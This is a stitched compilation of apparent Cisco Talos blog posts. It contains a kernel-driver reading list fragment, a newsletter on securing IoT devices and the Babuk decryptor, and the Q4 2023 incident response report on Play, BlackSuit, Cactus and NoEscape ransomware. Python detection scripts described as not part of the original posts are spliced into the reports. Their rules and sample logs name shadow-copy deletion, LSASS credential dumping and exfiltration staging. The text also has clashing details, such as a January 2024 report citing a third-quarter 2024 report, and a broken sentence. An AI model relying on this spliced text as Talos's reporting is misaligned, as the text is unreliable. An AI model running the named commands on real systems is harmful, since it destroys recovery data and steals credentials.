Until the next entry in this series, we recommend exploring the links provided throughout this blog. The basic concepts surrounding drivers and the kernel environment will become familiar with exposure to them, as well as reading the documentation or relevant research. Below is a list of recommended readings that will provide invaluable information on how drivers are written and the way they work.

Books

  • Windows Kernel Programming by Pavel Yosifovich
    • Fantastic in-depth overview of Windows kernel programming.
  • Windows NT Device Driver Development by Peter Viscarola, W. Anthony Mason
    • Older Windows device driver development book, but still has a large amount of currently relevant information.
  • Windows Internals: Part 1 & 2 by Pavel Yosifovich, Mark E. Russinovich, Alex Ionescu, David A. Solomon
    • Official book of Windows internals by Microsoft. Does not focus on the kernel but is a good reference to own.

What to do with that fancy new internet-connected device you got as a holiday gift

18 January 2024 at 19:00

Welcome to 2024! 

The Threat Source newsletter is back after our winter break. 

When I wasn’t spending my downtime chasing around my toddler, one of my main projects was to upgrade the internet connection at my house. My ISP started offering Gigabit speeds and a 60 GHz connection, which was appealing to me as someone who is always on a quest to find the best way to stream PS5 games to my Steam Deck. 

This sent me down a path of reconfiguring my home network and re-adding a bunch of devices to a new network. And even though this sounds like a totally basic skill for anyone who works in cybersecurity, it was a big deal for me to set up a separate IoT-only network. 

Many readers may have even gotten a new IoT device for a holiday gift. This mobile projector was featured on several “Top Gifts of 2023” lists I was looking at in December, and there are always the slam dunk gifts of a new home AI assistant like Google Home or the Amazon Echo Show to control all things “smart” in your home. 

And we all know that, by being connected to the internet, many of these IoT devices are going to be vulnerable to adversaries. Last week, researchers found a network-connected torque wrench used in many industrial environments could be infected with ransomware.  

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues, so I don’t think I need to run down those dangers in this newsletter. I wanted to take this space to share a few reminders and best practices of how to best set up these devices and manage them. This is a topic I covered previously in video format a few years ago, but I’m sure much of the UI/UX in this tutorial has changed since then, and I feel like I learned quite a bit from “YouTube University” over the past week or so in my own journey. 

  • Use network mapping software to track which devices connect to your network using what communication methods. NetworkMaps is a free, open-source option that I used when I was taking cybersecurity courses online.  
  • Create an IoT-specific network. This was super easy for me to do with the Gigabit-enabled router my ISP sent me, but I set up a network specifically for these devices to connect to (like my baby monitor, smart TVs, etc.) with a completely different network name and password from my “main” network. This keeps these devices segmented so that, if a bad guy is lurking, they stay on that IoT-specific network that doesn’t talk to your more sensitive devices like a work laptop. 
  • Make sure your router’s firewall is enabled, disable WPS and enable the WPA2 or WPA3 security protocol. 
  • Immediately change the default usernames and passwords that come with any new WiFi-connected device you’re setting up. 
  • Any home routers or IoT devices could point to OpenDNS servers for an additional (and free!) layer of security.
  • Disable any additional features or data-sharing you feel like you don’t need. The prime example of this for me is Amazon Sidewalk, the community network that allows Amazon devices to talk to one another and send alerts to users about various goings-on in their respective communities. The main drawback for me is that it allows your neighbors to pull off just a little of your internet bandwidth for their connected devices, too, and opens a whole slew of privacy concerns. 
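As an added example (not part of this newsletter, and not code from any router or product it mentions), here is a small Python audit of a router's DHCP lease file against a list of the devices you know about. It parses dnsmasq-style lease lines, reports MAC addresses you have not labelled, and reports any labelled IoT device that has joined the main network instead of the IoT one (or the reverse). The lease lines, MAC addresses, device names and subnets are constructed for the example; swap in your own router's lease export.

```python
"""Audit DHCP leases against a known-device list.

Added example (not from the newsletter): parses dnsmasq-style lease
lines ("<expiry> <mac> <ip> <hostname> <client-id>"), flags MACs that
are not on the allowlist, and flags known devices that show up on the
wrong network segment. All sample data below is constructed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Lease:
    mac: str
    ip: ipaddress.IPv4Address
    hostname: str


def parse_leases(text: str) -> list[Lease]:
    """Parse dnsmasq lease lines; malformed or blank lines are skipped."""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _expiry, mac, ip, hostname = parts[:4]
        leases.append(Lease(mac.lower(), ipaddress.IPv4Address(ip), hostname))
    return leases


def audit_leases(text: str, allowlist: dict, iot_subnet: str, main_subnet: str) -> dict:
    """Return unknown devices and devices seen on the wrong segment.

    allowlist maps a MAC to (friendly name, expected segment), where the
    segment is "iot" or "main".
    """
    iot = ipaddress.IPv4Network(iot_subnet)
    main = ipaddress.IPv4Network(main_subnet)
    unknown, misplaced = [], []
    for lease in parse_leases(text):
        entry = allowlist.get(lease.mac)
        if entry is None:
            unknown.append(lease)          # never labelled: go find out what it is
            continue
        name, segment = entry
        if segment == "iot" and lease.ip in main:
            misplaced.append((name, lease))  # IoT gadget joined the main network
        elif segment == "main" and lease.ip in iot:
            misplaced.append((name, lease))  # trusted device joined the IoT network
    return {"unknown": unknown, "misplaced": misplaced}


# Constructed sample data: a hypothetical allowlist and lease file.
ALLOWLIST = {
    "aa:bb:cc:00:00:01": ("work-laptop", "main"),
    "aa:bb:cc:00:00:02": ("baby-monitor", "iot"),
    "aa:bb:cc:00:00:03": ("living-room-tv", "iot"),
}
LEASES = """\
1705600000 aa:bb:cc:00:00:01 192.168.1.20 work-laptop 01:aa:bb:cc:00:00:01
1705600100 aa:bb:cc:00:00:02 192.168.50.10 baby-monitor 01:aa:bb:cc:00:00:02
1705600200 aa:bb:cc:00:00:03 192.168.1.31 living-room-tv 01:aa:bb:cc:00:00:03
1705600300 aa:bb:cc:00:00:99 192.168.50.44 * 01:aa:bb:cc:00:00:99
"""

if __name__ == "__main__":
    result = audit_leases(LEASES, ALLOWLIST, "192.168.50.0/24", "192.168.1.0/24")
    for lease in result["unknown"]:
        print(f"UNKNOWN   {lease.mac} {lease.ip} {lease.hostname}")
    for name, lease in result["misplaced"]:
        print(f"MISPLACED {name} ({lease.mac}) is on {lease.ip}")
```

Run it against a fresh lease export each week and the list of unknown MACs is your "what joined my network" report; the misplaced list catches the TV that got re-paired to the wrong SSID after a reset.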

The one big thing 

Cisco Talos recently worked with fellow security company Avast to release a new version of the decryptor for the Babuk ransomware. Our researchers obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor in its latest variant. 

Why do I care? 

Babuk is one of the most prevalent ransomware families in the wild right now, so any additional resource that lets victims recover faster, and for free, is good news. Dutch Police, acting on threat intelligence supplied by Talos, identified and apprehended the threat actor behind the Babuk Tortilla operations, and the Dutch Prosecution Office prosecuted them, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.  

So now what? 

The newest version of the decryptor is now available through No More Ransom, or directly on Avast’s website. Continued action from law enforcement to track down, apprehend and charge the operators behind ransomware is one of the many important steps we can take as a society and security community to reduce the prevalence of ransomware. 

Top security headlines of the week 

Security researchers are warning of actively exploited vulnerabilities in the Ivanti Connect Secure VPN that, as of Wednesday, still did not have a patch available. The vulnerabilities are an authentication bypass flaw (CVE-2023-46805) and a command injection issue (CVE-2024-21887). An adversary could chain these vulnerabilities to execute arbitrary commands on the targeted appliance. Incident response firm Volexity said earlier this week that government agencies and military branches across the globe, as well as several Fortune 500 private companies. Chinese state-sponsored actor UTA0178 is suspected to be behind the exploitation of these vulnerabilities, some dating back to December. Ivanti says it is still developing patches for these issues, one of which may not be available until mid-February. In the meantime, users should follow the mitigation steps outlined by Ivanti, and implement a new scanner that can detect exploitation attempts. (DarkReading, SecurityWeek) 

Britain’s national library is working to restore its online services 11 weeks after a cyber attack, though a full recovery may take until the end of the year. The British Library started restoring read-only versions of its online catalog last week, including records of printed and rare books, maps, journals and music scores. The Rhysida ransomware group initially took credit for the attack in October 2023, claiming it was offering personal information for sale on the dark web. The library eventually confirmed that some employee data had been stolen in the attack, and it had to temporarily take its entire catalog offline. The attack also held up the payment system through which the library rewards authors and creators each time one of their works is checked out. (The Guardian, The New York Times) 

Chinese government officials have apparently found a way to de-anonymize Apple AirDrop users to track anyone sharing content that’s outlawed by the country. AirDrop is normally encrypted, and has been used previously to share messages, content and art with other iPhone users in public that is against the ruling Communist Party in China. But the Beijing municipal government's justice bureau says China-backed experts have found a way to carry out a complex encryption attack to reveal the original sender of the messages and prosecute them. In November 2022, Apple updated AirDrop settings so users in China could only opt-in to receive files from unknown contacts during a 10-minute window before it automatically shut off. The feature did not previously have a time limit. Translations of government statements indicate that the method involves what are known as “rainbow tables” to defeat the measures AirDrop has in place to obfuscate users' phone numbers and email addresses. (Ars Technica, CBS) 

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31 
MD5: 2fb86be791b4bb4389e55df0fec04eb7 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net 
Detection Name: W32.File.MalParent 

SHA 256: 36efad0617db0d45de00cc4f3cf49af7c2d6b5b15ca456d13703b5d366c58431 
MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab 
MD5: 4c648967aeac81b18b53a3cb357120f4 
Typical Filename: yypnexwqivdpvdeakbmmd.exe 
Claimed Product: N/A  
Detection Name: Win.Dropper.Scar::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: 39b0d4bad98713924775595834f1e07598a12c2622977578739222e09766066c 
MD5: a543017b4fa809e9f6b7251e7c14a5b0 
Typical Filename: a543017b4fa809e9f6b7251e7c14a5b0 
Claimed Product: N/A   
Detection Name: Auto.39B0D4BAD9.232061.in07.Talos 

IR Q4 2023 trends: Significant increase in ransomware activity found in engagements, while education remains one of the most-targeted sectors

24 January 2024 at 13:00

First time ransomware was the top threat in 2023, according to Q4 2023 Talos Incident Response report

Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Cisco Talos Incident Response (Talos IR), notably a 17 percent increase from the previous quarter.

Talos IR observed operations involving Play, Cactus, BlackSuit and NoEscape ransomware for the first time this quarter. 

As reflected in Talos IR’s quarterly report for the third quarter of 2024, the team responded to many incidents with miscellaneous post-compromise activity, though these attacks were limited in scale and contained by security efforts early in the attack chain before the adversary’s objectives could be fully determined. Other substantial threats this quarter included an insider threat attack and phishing campaigns, including a phishing cluster using malicious QR codes. 

Education and manufacturing were tied for the most targeted verticals, together accounting for nearly 50 percent of the total number of incident response engagements, closely followed by healthcare and public administration. Compared to last quarter, we observed only a slight increase in engagements targeting the education sector while there was a 10 percent increase in engagements affecting the manufacturing vertical.

Adversaries commonly target entities in the education sector to conduct ransomware attacks or access sensitive student and faculty personally identifiable information (PII), such as financial data and credentials. Schools with limited cybersecurity capabilities and constrained resources are often the most vulnerable, as security remains a cost center. However, the opportunistic targeting employed by adversaries can still put school districts with robust cybersecurity programs at risk. Exfiltrated PII data remains an attractive target that is leveraged for follow-on attacks, sold on dark web forums, or used for monetary theft. 

The manufacturing sector faces unique challenges due to its inherently low tolerance for operational downtime. The sector's crucial role in producing goods fundamental to various other critical infrastructure sectors means that any disruption in manufacturing processes not only affects the industry itself but may have cascading effects on the supply chain and dependent sectors. Supply chain attacks are a concern for the manufacturing sector, as such incidents can create unstable supply chain conditions that require immediate attention and action to protect assets, operations and/or reputation.

Ransomware activity increases

Play ransomware

Talos IR responded to a Play ransomware attack for the first time this quarter where adversaries used the legitimate remote access software AnyDesk to deepen their access and remain persistent. The adversaries used PsExec, an IT administration utility that allows users to execute programs on another computer, to disable security tools across multiple endpoints, likely to evade detection. After collecting credentials from various locations such as the Windows Registry, the attackers were able to compromise multiple domain controllers which were used to deploy ransomware across the environment. 

In another Play ransomware engagement, Talos IR assessed with low confidence that after obtaining user credentials, the attackers attempted to bypass multi-factor authentication (MFA) by calling the organization’s help desk to register a new MFA device. This is an example of “vishing,” a social engineering technique in which attackers try to trick victims over the phone. While Talos is aware of other ransomware and cybercriminal groups who use vishing to gain initial access, it is not a technique we had previously associated with Play ransomware affiliates. Attackers also leveraged the open-source Windows password spraying tool SharpSpray and IP addresses associated with SurfShark and BlueVPS virtual private network (VPN) and virtual private server (VPS) providers. These methods and tools leveraged by Play affiliates are not well-documented in open-source reporting, suggesting these may be newly adopted techniques.  

Once inside the network, the adversaries executed several enumeration commands, such as "whoami" and "net group /domain," which provide information about the system owner and permission groups. Next, they dumped credentials from the memory of the Local Security Authority Subsystem Service (LSASS) and moved laterally by abusing Remote Desktop Protocol (RDP). A combination of the archive tool WinRAR and the open-source file transfer protocol (FTP) tool WinSCP was used for data exfiltration. Talos IR identified several persistence mechanisms deployed by the threat actors, including scheduled tasks and registry startup items. Before the execution of the ransomware binary, the attackers disabled several security tools and deleted the volume shadow copies to evade detection and inhibit system recovery. 
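The activity chain described in this engagement (enumeration commands, LSASS credential dumping, WinRAR and WinSCP for exfiltration, shadow copy deletion before encryption) is visible in ordinary endpoint telemetry. As an added example that is not from the Talos IR report, the Python below runs a few detection rules over constructed Sysmon-style process-creation and process-access records and reports, per host, which stages were seen and whether they appeared in chain order. The event records, host names, file paths and the allowlist of processes permitted to open LSASS are all constructed for the example and would need tuning for a real fleet.

```python
"""Flag the pre-ransomware activity chain in endpoint telemetry.

Added example (not from the Talos IR report): runs detection rules over
constructed Sysmon-style events and reports, per host, which stages of
the chain were observed: discovery commands, LSASS memory access by a
process that is not on the reader allowlist, archiving with WinRAR,
WinSCP usage, and shadow copy deletion. All sample data is constructed.
"""
import re
from collections import defaultdict

# Command-line rules applied to process-creation events: (label, pattern).
CMDLINE_RULES = [
    ("discovery", re.compile(r"^\s*(whoami\b|net\s+group\s+/domain)", re.I)),
    ("archive", re.compile(r"\b(winrar|rar)\.exe\s+a\b", re.I)),
    ("transfer-tool", re.compile(r"\bwinscp\.exe\b", re.I)),
    ("inhibit-recovery", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
]

# Processes that legitimately open LSASS (hypothetical allowlist; tune per fleet).
LSASS_READER_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a detection label for one event, or None if it is benign."""
    if event["event"] == "process_access":
        if (basename(event["target_image"]) == "lsass.exe"
                and basename(event["image"]) not in LSASS_READER_ALLOWLIST):
            return "credential-access-lsass"
        return None
    if event["event"] == "process_create":
        for label, pattern in CMDLINE_RULES:
            if pattern.search(event["cmdline"]):
                return label
    return None


def analyze(events):
    """Map each host to the ordered list of labels seen on it."""
    findings = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev)
        if label:
            findings[ev["host"]].append(label)
    return dict(findings)


def chain_hosts(findings, stages=("discovery", "credential-access-lsass", "inhibit-recovery")):
    """Hosts on which the given stages appeared in that order."""
    hosts = []
    for host, labels in findings.items():
        pos, ok = -1, True
        for stage in stages:
            try:
                pos = labels.index(stage, pos + 1)
            except ValueError:
                ok = False
                break
        if ok:
            hosts.append(host)
    return sorted(hosts)


# Constructed sample telemetry (two hosts; WS02 only shows a benign LSASS read and one whoami).
EVENTS = [
    {"ts": 1, "host": "WS01", "event": "process_create", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"ts": 2, "host": "WS01", "event": "process_create", "image": r"C:\Windows\System32\net.exe", "cmdline": "net group /domain"},
    {"ts": 3, "host": "WS01", "event": "process_access", "image": r"C:\Users\Public\tool.exe", "target_image": r"C:\Windows\System32\lsass.exe"},
    {"ts": 4, "host": "WS01", "event": "process_create", "image": r"C:\Program Files\WinRAR\WinRAR.exe", "cmdline": r"WinRAR.exe a -r staging.rar C:\Finance"},
    {"ts": 5, "host": "WS01", "event": "process_create", "image": r"C:\Program Files\WinSCP\WinSCP.exe", "cmdline": "WinSCP.exe"},
    {"ts": 6, "host": "WS01", "event": "process_create", "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin delete shadows"},
    {"ts": 7, "host": "WS02", "event": "process_access", "image": r"C:\Windows\System32\csrss.exe", "target_image": r"C:\Windows\System32\lsass.exe"},
    {"ts": 8, "host": "WS02", "event": "process_create", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
]

if __name__ == "__main__":
    found = analyze(EVENTS)
    for host, labels in found.items():
        print(host, "->", ", ".join(labels))
    print("hosts showing the full chain:", chain_hosts(found))
```

A single `whoami` is noise on its own (WS02 here), which is why the chain check only escalates when discovery, LSASS access and recovery inhibition line up on the same host in that order.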

First discovered in June 2022, Play (also known as Playcrypt) ransomware group has targeted over 300 organizations across the globe within the public and private sectors. Play affiliates typically compromise victim networks and append the “.PLAY” extension when encrypting files. Initial access vectors leveraged in Play attacks vary from social engineering to exploiting vulnerabilities in public-facing applications.

BlackSuit ransomware

In a ransomware engagement, Talos IR responded to a BlackSuit ransomware incident for the first time where threat actors used stolen VPN credentials to gain access to an account that did not have MFA enabled. Attackers enumerated the network and permission groups before dumping credentials from memory with the credential harvesting tool Mimikatz. Attackers exploited the privilege escalation vulnerability dubbed "ZeroLogon," tracked as CVE-2020-1472, which allows remote unauthenticated attackers to access domain controllers and obtain domain administrator access. The legitimate remote access software ScreenConnect was also used for command and control (C2) communication throughout the attack. 

First discovered in May 2023, BlackSuit ransomware is suspected to be a rebrand of the Royal ransomware operation. Royal, first discovered in September 2022, was hypothesized to be the successor to the Conti ransomware operation that voluntarily shut down in May 2022. Royal and Conti were known for heavily targeting several critical infrastructure sectors, including manufacturing, healthcare and public health (HPH), and education. The BlackSuit ransomware operation has followed this pattern and has been heavily targeting the education sector throughout 2023, which will likely continue into 2024 as the group has already posted a victim in the education industry since the start of the new year. 

Cactus ransomware

Talos IR responded to a Cactus ransomware attack for the first time this quarter in an engagement where the adversaries gained access using compromised credentials for a VPN account that was not secured with MFA. Throughout the attack, the adversaries created multiple accounts and added them to the administrator's group, which were then used to evade detection, escalate privileges, and remain persistent in the environment. Attackers moved laterally in the environment by abusing RDP, scheduled tasks, and Windows Management Instrumentation Command (WMIC), techniques commonly observed across similar ransomware attacks. The security registry key file, which contains account policies, user permissions, and encrypted versions of passwords, was duplicated by the threat actors but renamed backward to “ytiruces.” By copying this file, attackers might be trying to maintain access to the credentials, which they can decrypt and use later. Talos IR observed a few other duplicate registry files with reverse names, which could have been a tactic used to mark files that have already been exfiltrated or analyzed.
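The reversed-name trick ("ytiruces" for the SECURITY hive) is cheap to hunt for. As an added example that is not from the Talos IR report, the Python below takes a list of file paths (from a file-creation log or a disk sweep) and flags two things: a file name that is a registry hive name spelled backwards, and a hive-named file sitting outside the directories Windows keeps hives in. The paths, and the set of legitimate hive directories, are constructed for the example.

```python
r"""Spot copied registry hives hidden under reversed names.

Added example (not from the Talos IR report): flags file names that are a
hive name spelled backwards ("ytiruces" for SECURITY, "mas" for SAM) and
hive-named files found outside %SystemRoot%\System32\config or the NTDS
directory. The path list and the directory allowlist are constructed.
"""
HIVES = {"sam", "security", "system", "software", "ntds"}
# Directories where hive-named files are expected (hypothetical allowlist).
LEGIT_HIVE_DIRS = ("\\windows\\system32\\config\\", "\\windows\\ntds\\")


def stem_of(path: str) -> str:
    """Lower-cased file name without its last extension."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def suspicious_hive_copies(paths):
    """Return (path, reason) for every path that looks like a stashed hive."""
    hits = []
    for path in paths:
        stem = stem_of(path)
        normalized = path.replace("/", "\\").lower()
        if stem[::-1] in HIVES:
            hits.append((path, f"reversed hive name ({stem[::-1]})"))
        elif stem in HIVES and not any(d in normalized for d in LEGIT_HIVE_DIRS):
            hits.append((path, f"hive copy outside config directory ({stem})"))
    return hits


# Constructed sample: two legitimate hive locations, two reversed names, one stray copy.
SAMPLE_PATHS = [
    r"C:\Windows\System32\config\SECURITY",
    r"C:\Windows\NTDS\ntds.dit",
    r"C:\Users\Public\ytiruces",
    r"C:\Temp\mas.hiv",
    r"C:\Temp\sam.save",
    r"C:\Users\Public\report.docx",
]

if __name__ == "__main__":
    for path, reason in suspicious_hive_copies(SAMPLE_PATHS):
        print(f"{reason}: {path}")
```

Backup software does legitimately write hive copies, so treat the "outside config directory" reason as a triage lead and the reversed-name reason as the stronger signal.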

First discovered in March 2023, Cactus works as a ransomware-as-a-service (RaaS) and is known to exploit vulnerabilities and leverage malvertising lures for initial access. Cactus ransomware targeting and victimology appear to be opportunistic and indiscriminate, appending the file extension “.cts1” to the end of encrypted files, with the numerical value varying between victims. Talos IR observed Cactus ransomware affiliates using custom scripts to disable security tools and distribute the ransomware. 

NoEscape ransomware

Talos IR also responded to NoEscape ransomware for the first time this quarter in an engagement in which threat actors leveraged the “Citrix Bleed” authentication bypass vulnerability in Citrix NetScaler web application delivery control (ADC) and Gateway appliances, which Citrix released a patch for in October 2023. Tracked as CVE-2023-4966, this vulnerability allows attackers to bypass password and MFA requirements by obtaining session tokens. While exploitation of CVE-2023-4966 represents a new vulnerability leveraged by NoEscape ransomware affiliates, the targeting of Citrix Bleed is consistent with the group’s previous attacks against virtual desktop infrastructure, and appears to be part of a broader mass campaign initially led by LockBit 3.0 ransomware affiliates. In addition to patching affected systems, Talos also recommends invalidating all active session tokens because if any of the session tokens are stolen they can still be abused by attackers leaving the organization vulnerable to attacks. 

After the NoEscape affiliate gained access to the environment, they installed several persistence mechanisms including the ITarian remote monitoring and management (RMM) solution, a remote access utility Talos IR has not previously seen ransomware affiliates use. The adversary leveraged the access granted by ITarian and other tools to steal additional privileged credentials and lay the groundwork for future ransomware deployment. ITarian is highly similar to other RMMs commonly seen in Talos IR ransomware engagements such as TeamViewer, Atera, AnyDesk and Syncro that can access files or workstations remotely. The affiliate also used several other tools commonly seen in pre-ransomware activities, including Cobalt Strike and Sliver, two penetration testing and red team toolkits frequently used for persistence, code execution and lateral movement. The use of Sliver is interesting in that Talos IR has not seen it used in ransomware attack chains since late 2022. The Sliver implants were packed using PEzor, a tool that obfuscates the executables’ contents to prevent anti-virus detection and blocking. Attackers leveraged PsExec to copy and execute two ransomware payloads across the network. 

NoEscape is a RaaS that emerged in May 2023 and has used multiple extortion tactics including data theft and distributed denial-of-service (DDoS) attacks to coerce payments from victims. NoEscape operates a profit-sharing model where the ransom proceeds are split between the ransomware’s developers and the affiliates/customers who pay to use it. Consistent with many RaaS groups, NoEscape has indiscriminately targeted organizations of all sizes across many different industries. In December 2023, Talos began monitoring claims on the dark web that NoEscape’s developers executed an “exit scam” in which they stole several of their affiliates' deposits and ransom payouts before possibly shutting down their operation. NoEscape’s leak site was taken down on Dec. 9, 2023, and continues to be offline. 

On Dec. 19, 2023, the Federal Bureau of Investigation (FBI) announced a disruption campaign against the ALPHV (BlackCat) ransomware operation, which had been active since late 2021. Although not observed by Talos IR this quarter, ALPHV was one of the most prolific ransomware groups in 2023 following LockBit ransomware. Talos assesses that recent law enforcement efforts may divert additional resources to the LockBit ransomware group, significantly improving its capabilities. Notably, the LockBit ransomware group posted on a Russian-speaking dark web forum in December 2023 offering to recruit ALPHV and NoEscape affiliates as well as any of the ALPHV developers. With a current lack of intelligence regarding this new strategy, it is too early to determine whether any of the prospective ALPHV affiliates considered, or moved over to, LockBit. However, if ALPHV and LockBit were to collaborate, this potential amalgamation of tactics, techniques and operational capabilities would likely result in more potent and evasive ransomware variants, complicating detection and mitigation efforts, and likely significantly altering the ransomware landscape as we move through the new year. 

Other observed threats

In an insider threat engagement, a disgruntled former employee whose account was not properly decommissioned remotely removed all configurations on a network switch before rebooting it, which functionally restored the switch to its factory default configuration. A switch is a piece of hardware that connects network devices and helps manage all of the traffic. When a switch fails, it can lead to network downtime, loss of productivity, and potentially expose the network to security risks. Talos recommends organizations implement secure off-boarding procedures to protect the confidentiality, integrity and availability of sensitive data. 

In one cluster of phishing activity, several employees received spear phishing emails with malicious QR codes that, when scanned, led to a fake Microsoft 365 sign-in page, consistent with a growing trend in public reporting. Once the attackers obtained stolen credentials, they proceeded to use an MFA exhaustion attack that resulted in some employees approving the push notifications on their mobile devices. In an MFA exhaustion attack, an adversary hopes to overwhelm users with MFA push notifications in hopes they will inadvertently grant access. 

Phishing attacks leveraging QR codes are concerning because, if successful, employees will likely use their mobile devices, which leads defenders to lose visibility. Additionally, most email security solutions, such as secure email gateways (SEGs), cannot detect malicious QR codes. With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices. According to a 2023 report by cybersecurity firm Agency, 97 percent of respondents access their work accounts from their devices. Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. 

There was a significant increase in QR code phishing in 2023, according to public reporting. Talos IR responded to a QR code phishing campaign for the first time in an engagement where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their mobile devices, thereby leading to malware being executed on the mobile devices. As a result, the attack surface shifts as enterprise security protocols and monitoring systems have less control and visibility over personal devices compared to corporate-managed hardware outside of corporate networks. Additionally, most email security solutions, such as secure email gateways (SEGs) are currently unable to detect malicious QR codes.

Initial access 

The top observed means of gaining initial access was tied between using compromised credentials on valid accounts and exploiting public-facing applications, each accounting for 28 percent of engagements, closely followed by phishing. In the phishing engagements this quarter, Talos IR observed a mix of malicious links and QR codes leading to fake login sites crafted to steal credentials. 

Security weaknesses

A lack of MFA or proper MFA implementation across all user accounts as well as misconfigured or unpatched systems each played a part in 36 percent of the engagements Talos IR responded to this quarter. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as RDP. Talos IR recommends expanding MFA for all user accounts (e.g., employees, contractors, business partners, etc.). 

In some engagements, adversaries attempted to bypass MFA with MFA exhaustion, or fatigue, attacks. Users must have a clear understanding of the appropriate business response protocols when their devices are overwhelmed with an excessive volume of push notifications. We recommend organizations educate their employees about the specific channels and points of contact for reporting these incidents. Prompt and accurate reporting enables security teams to quickly identify the nature of the issue, and implement the necessary measures to address the situation effectively.
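The MFA exhaustion attacks described here and in the QR-code phishing cluster above leave a recognizable pattern in the identity provider's push log: a burst of prompts to one user in a short window, sometimes ending in an approval. As an added example that is not from the Talos IR report, the Python below groups constructed push events by user, flags any user who received at least a threshold number of prompts inside a sliding window, and separately records whether an approval landed inside such a burst. The event records and field names are constructed; a real identity provider's export will differ.

```python
"""Detect MFA exhaustion (push-fatigue) attempts in authentication logs.

Added example (not from the Talos IR report): groups MFA push events by
user, flags users who received at least `threshold` prompts within
`window_minutes`, and records whether an approval occurred inside such a
burst, which is the outcome the attacker is after. Events are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def detect_mfa_fatigue(events, window_minutes=10, threshold=5):
    """Return {user: {"max_burst", "flagged", "approved_in_burst"}}."""
    window = timedelta(minutes=window_minutes)
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev["result"]))

    report = {}
    for user, items in by_user.items():
        items.sort()
        max_burst, approved_in_burst, start = 0, False, 0
        for i, (ts, result) in enumerate(items):
            # Slide the window start forward until it is within `window` of this event.
            while ts - items[start][0] > window:
                start += 1
            burst = i - start + 1
            max_burst = max(max_burst, burst)
            if burst >= threshold and result == "approved":
                approved_in_burst = True  # a prompt was accepted during the flood
        report[user] = {
            "max_burst": max_burst,
            "flagged": max_burst >= threshold,
            "approved_in_burst": approved_in_burst,
        }
    return report


def flagged_users(report):
    return sorted(u for u, r in report.items() if r["flagged"])


# Constructed sample: alice is flooded and eventually approves; bob and carol are normal.
MFA_EVENTS = [
    {"ts": "2024-01-15T08:00:00", "user": "alice", "result": "timeout"},
    {"ts": "2024-01-15T08:01:00", "user": "alice", "result": "denied"},
    {"ts": "2024-01-15T08:02:00", "user": "alice", "result": "timeout"},
    {"ts": "2024-01-15T08:03:00", "user": "alice", "result": "timeout"},
    {"ts": "2024-01-15T08:04:00", "user": "alice", "result": "denied"},
    {"ts": "2024-01-15T08:05:00", "user": "alice", "result": "approved"},
    {"ts": "2024-01-15T08:00:00", "user": "bob", "result": "approved"},
    {"ts": "2024-01-15T12:00:00", "user": "bob", "result": "approved"},
    {"ts": "2024-01-15T09:00:00", "user": "carol", "result": "timeout"},
    {"ts": "2024-01-15T09:01:00", "user": "carol", "result": "timeout"},
    {"ts": "2024-01-15T09:02:00", "user": "carol", "result": "approved"},
    {"ts": "2024-01-15T09:03:00", "user": "carol", "result": "approved"},
]

if __name__ == "__main__":
    rep = detect_mfa_fatigue(MFA_EVENTS)
    for user in flagged_users(rep):
        print(user, rep[user])
```

The "approved_in_burst" flag is the one that should page someone: a flood of denials is an attempt, an approval inside the flood is a likely account compromise and the session should be revoked while the user is contacted through the reporting channel the text describes.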

Staying up to date with software updates is a crucial aspect of an organization’s security posture, as outdated systems present exploitable avenues for attackers to leverage. Attackers often exploit these software vulnerabilities to achieve a multitude of post-compromise objectives, such as privilege escalation and lateral movement. While vulnerability and patch management are critical, it is not always possible to immediately apply every security patch due to the complexity of enterprise networks. Talos IR recommends prioritizing vulnerabilities that pose the biggest threats to prevent exploitation. 

Top observed MITRE ATT&CK techniques

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements and includes relevant examples. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were leveraged. Please note, this is not an exhaustive list. 

Key findings from the MITRE ATT&CK framework include: 

  • Exploitation of public-facing applications was one of the top observed means of gaining initial access this quarter, accounting for 28 percent of total engagements, a slight increase from the previous quarter.
  • Remote access software, such as ScreenConnect, SplashTop and AnyDesk were used in nearly a fourth of engagements this quarter. 
  • Indicator removal, such as clearing Windows event logs and file deletion, was the top defense evasion technique observed.
